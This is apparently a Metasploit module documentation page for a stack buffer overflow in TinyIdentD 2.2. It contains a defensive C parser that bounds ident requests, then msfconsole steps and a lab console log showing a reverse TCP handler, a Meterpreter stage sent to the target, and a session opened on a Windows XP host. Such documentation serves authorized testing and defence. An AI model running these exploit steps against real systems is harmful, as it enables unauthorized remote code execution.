## Vulnerable Application

This module exploits a stack-based buffer overflow in TinyIdentD version 2.2.
Sending a long string to the ident service overwrites the return address and
allows arbitrary code execution. Credit to Maarten Boone.

Download:

* https://download.cnet.com/Tiny-IdentD/3000-2150_4-10147419.html
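
The defensive counterpart to the overflow described above, as an added example (not code from TinyIdentD or from this module): a bounded parser for RFC 1413 ident queries (`<port-on-server> , <port-on-client>`) that rejects an over-long line before anything copies it. The function names, status codes and the 64-byte cap are assumptions of the example, and the inputs in `main` are constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define IDENT_MAX_REQUEST 64 /* assumed cap; "65535 , 65535\r\n" is only 15 bytes */

enum ident_status { IDENT_OK, IDENT_TOO_LONG, IDENT_MALFORMED, IDENT_BAD_PORT };

/* Parse one decimal port (1..65535) at *pos; never reads past buf[len - 1]. */
static enum ident_status parse_port(const char *buf, size_t len, size_t *pos, unsigned *out)
{
    unsigned long v = 0;
    size_t digits = 0;
    while (*pos < len && (buf[*pos] == ' ' || buf[*pos] == '\t')) (*pos)++;
    while (*pos < len && isdigit((unsigned char)buf[*pos])) {
        v = v * 10 + (unsigned long)(buf[*pos] - '0');
        if (v > 65535 || ++digits > 5) return IDENT_BAD_PORT;
        (*pos)++;
    }
    if (digits == 0) return IDENT_MALFORMED;
    if (v == 0) return IDENT_BAD_PORT;
    while (*pos < len && (buf[*pos] == ' ' || buf[*pos] == '\t')) (*pos)++;
    *out = (unsigned)v;
    return IDENT_OK;
}

/* Validate one received request line (len bytes, terminator included). The length
 * check runs first, so an oversized line is rejected before anything copies it. */
enum ident_status ident_parse_request(const char *buf, size_t len,
                                      unsigned *server_port, unsigned *client_port)
{
    size_t pos = 0;
    enum ident_status rc;
    if (len > IDENT_MAX_REQUEST) return IDENT_TOO_LONG;
    if ((rc = parse_port(buf, len, &pos, server_port)) != IDENT_OK) return rc;
    if (pos >= len || buf[pos++] != ',') return IDENT_MALFORMED;
    if ((rc = parse_port(buf, len, &pos, client_port)) != IDENT_OK) return rc;
    if (pos < len && buf[pos] == '\r') pos++;      /* optional CR before LF */
    if (pos + 1 != len || buf[pos] != '\n') return IDENT_MALFORMED;
    return IDENT_OK;
}

int main(void)
{
    char big[512];                                  /* constructed oversized input */
    unsigned s = 0, c = 0;
    memset(big, 'A', sizeof big);
    printf("valid query: %d\n", ident_parse_request("6193, 23\r\n", 10, &s, &c));
    printf("512-byte line: %d\n", ident_parse_request(big, sizeof big, &s, &c));
}
```

The same length and grammar checks can be applied at a proxy or IDS in front of port 113, since a well-formed ident query never approaches the cap.
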
## Verification Steps
1. Start `msfconsole`
2. `use exploit/windows/misc/tiny_identd_overflow`
3. `set RHOSTS <rhost>`
4. `set TARGET <target>`
5. `run`
6. You should get a new session
## Options
## Scenarios
### TinyIdentD 2.2 on Windows XP SP0 - English (x86)
```
msf5 > use exploit/windows/misc/tiny_identd_overflow
msf5 exploit(windows/misc/tiny_identd_overflow) > show targets
Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   Windows 2000 Server SP4 - English
   2   Windows 2000 Pro All - English
   3   Windows 2000 Pro All - Italian
   4   Windows 2000 Pro All - French
   5   Windows XP SP0/1 - English
   6   Windows XP SP2 - English
   7   Windows XP SP2 - Italian

msf5 exploit(windows/misc/tiny_identd_overflow) > set target 5
target => 5
msf5 exploit(windows/misc/tiny_identd_overflow) > set rhosts 172.16.191.140
rhosts => 172.16.191.140
msf5 exploit(windows/misc/tiny_identd_overflow) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[*] 172.16.191.140:113 - Trying Windows XP SP0/1 - English using address at 0x71aa1a97 ...
[*] Sending stage (176195 bytes) to 172.16.191.140
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.140:1040) at 2020-05-23 00:00:56 -0400
meterpreter > sysinfo
Computer        : WINXP
OS              : Windows XP (5.1 Build 2600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
```